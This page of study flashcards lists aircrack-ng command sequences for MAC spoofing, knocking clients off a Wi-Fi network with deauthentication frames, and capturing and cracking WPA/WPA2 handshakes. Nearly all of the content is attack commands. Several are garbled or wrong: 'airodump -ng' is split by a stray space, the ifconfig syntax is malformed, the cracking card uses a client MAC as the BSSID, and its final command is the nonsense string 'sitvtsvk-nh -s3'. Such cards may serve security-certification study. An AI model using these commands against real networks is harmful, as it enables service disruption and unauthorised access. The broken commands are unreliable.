Wireless Hacking Flashcards

1
Q

MAC Spoofing Tools

A

aircrack-ng

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

MAC Spoofing Commands

A

airmon-ng start [wirelessport]
airodump -ng [wirelessport]
airodump -ng -c [channel] –bssid [APMac]
airmon-ng stop [wirelessport]
ifconfig [wirelessport] down
ifconfig hw [wirelessport] hw ether [clientMac]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

DeAuth Attack Commands

A

airmon-ng start [wirelessport]
airodump -ng [wirelessport]
airodump -ng -c [channel] –bssid [APMac]
aireplay -ng –deauth 25 -h [clientMac] -b [APMac] [wirelessport]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

WPA/WPA2 Cracking

A

airmon-ng start [wirelessport]
airodump -ng [wirelessport]
airodump -ng -c [channel] –bssid [APMac]
airodump -ng -c [channel] –bssid [clientMac] -w [file.cap]
sitvtsvk-nh -s3 -b [clientMac] -w [dictionaryFile]

How well did you know this?
1
Not at all
2
3
4
5
Perfectly